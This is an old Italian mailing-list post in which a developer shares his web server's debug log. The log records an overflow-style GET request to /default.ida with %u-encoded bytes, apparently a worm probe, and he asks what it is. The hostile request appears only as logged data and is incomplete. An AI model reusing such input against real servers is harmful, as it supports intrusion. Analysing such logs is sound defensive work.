[bglug] hackers...

Riccardo Mottola bglug@lists.linux.it
Mon, 16 Sep 2002 13:57:30 +0200


Ciao!

certo che non si puo' star sicuri due minuti... guardate cosa mi e' venuto
nel debug log del mio webserver che sto sviluppando!

accepted from 61.144.148.30
0 - |GET 
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0|
1 - |Content-type: text/xm
2 - |HOST:www.worm.co|
3 - | Accept: */|
4 - |Content-length: 3569 |
handling get of /default.ida
listen

se questo non cercava di fare un exploit? che file puo' essere .ida ?
in ogni caso cercava di mandare in buffer overflow la query_string
e come dominio worm.co!!! assurdo

ciao

ric